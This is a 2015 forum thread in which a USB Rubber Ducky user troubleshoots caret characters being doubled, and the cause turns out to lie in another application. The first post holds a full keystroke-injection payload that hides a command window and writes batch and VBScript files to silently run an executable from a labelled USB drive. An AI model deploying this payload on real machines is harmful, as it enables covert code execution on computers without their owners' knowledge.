bytecode77 Posted March 7, 2015 Posted March 7, 2015 So I'm writing into a BAT file in order to achieve file execution. This is one line in that BAT file: for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d However, all the ^ are replaced with ^^. So in the end, the code is invalid. Also, even when writing in the forums right now in my browser, I still enter ^^ when pressing circumflex once. What happened? This is my ducky code: DEFAULT_DELAY 50 DELAY 2000 GUI r DELAY 750 STRING cmd /Q /D /T:78 /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE DOWNARROW ENTER DOWNARROW REPEAT 100 ENTER STRING cd %TEMP% ENTER STRING erase /Q test1.bat ENTER STRING copy con test1.bat ENTER STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d ENTER STRING if Exist %ddrv% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 15 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING START %ddrv%\test.exe ENTER CONTROL z ENTER STRING erase /Q test1.vbs ENTER STRING copy con test1.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL z ENTER STRING wscript.exe test1.vbs test1.bat ENTER STRING exit ENTER Quote
no42 Posted March 11, 2015 Posted March 11, 2015 Some initial questions: 1) Version of the encoder you used? 2) Version of the firmware you used? 3) Did you use a specific language map? Quote
bytecode77 Posted March 11, 2015 Author Posted March 11, 2015 1. I used the online encoder 2. I recently upgraded to the TwinDuck firmware 3. German language map. But it used to work with this setup, then it suddenly didn't. Quote
no42 Posted March 11, 2015 Posted March 11, 2015 Can you try the offline encoders? I want to figure out what version this bug might have crept in. Thanks ~ Quote
bytecode77 Posted March 12, 2015 Author Posted March 12, 2015 I can't seem to find an encoder besides Ducky Toolkit. Can you point me to the encoder you mean? Quote
bytecode77 Posted March 12, 2015 Author Posted March 12, 2015 Also, as an update, I tested it again. Apparently this issue only occurs the second time I insert the USB drive into my computer. But then, the "^^" is consistent with all applications on my computer, CMD, notepad, even on my browser as I'm typing here. ^^ Quote
no42 Posted March 12, 2015 Posted March 12, 2015 Just look at the ducky decode website, any newer encoders are now on google drive. Another way is to post the inject.bin file; i can easily reverse it; or hopefully others can, I'm pretty sporadic on here these days Quote
bytecode77 Posted March 13, 2015 Author Posted March 13, 2015 I just downloaded and used the current offline encoder and I figured out that the error lies somewhere else in another application. It has nothing todo with the rubber ducky. Thanks for your friendly advice, tho! Good to know there's an offline encoder anyway :) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.